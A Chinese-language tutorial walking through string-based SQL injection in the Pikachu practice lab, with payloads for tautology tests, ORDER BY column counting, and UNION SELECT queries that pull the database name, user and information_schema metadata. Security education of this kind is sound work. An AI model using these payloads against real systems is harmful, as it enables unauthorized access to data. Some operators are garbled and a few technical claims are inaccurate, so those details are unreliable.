ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

PIKACHU_SQL(string-based)

PIKACHU_SQL(string-based) SQL注入的模型——输入- GET参数- PHP - SQL查询- mysql - 页面结果背后的逻辑代码通常是 SELECT * FROM users WHERE username ‘$username’ ;一正常测试——输入 admin 应该被放在单引号中二测试是否字符型注入——输入单引号’如果查询结果发生变化说明原来的SQL结构被破坏三布尔条件来判断是否存在字符型SQL注入——输入永真条件1’ OR ‘1’‘1’ # 页面返回多个用户如图输入永假条件1’ OR ‘1’‘2’ # 没有返回用户确认有SQL注入四判断列数——输入1’ ORDER BY 2 # 数字从1-3类推然后输入1’ UNION SELECT 1,2 # 验证列数五联合查询数据库信息包括库名、表名、字段等输入 1’UNION SELECT 1,database() #1‘ UNION SELECT 1,user() # 回显如图输入 1’ UNION SELECT 1,COUNT(*) FROM information_schema.tables # 回显如图六重要字段information_schema是mysql 5.7版本后用来提供数据可结构信息的系统数据库table_schema 是元数据表 information_schema.tables 里面的一个字段七聚合函数让结果变成一行输入1‘ UNION SELECT 1,MIN(table_schema) FROM information_schema.tables #
返回列表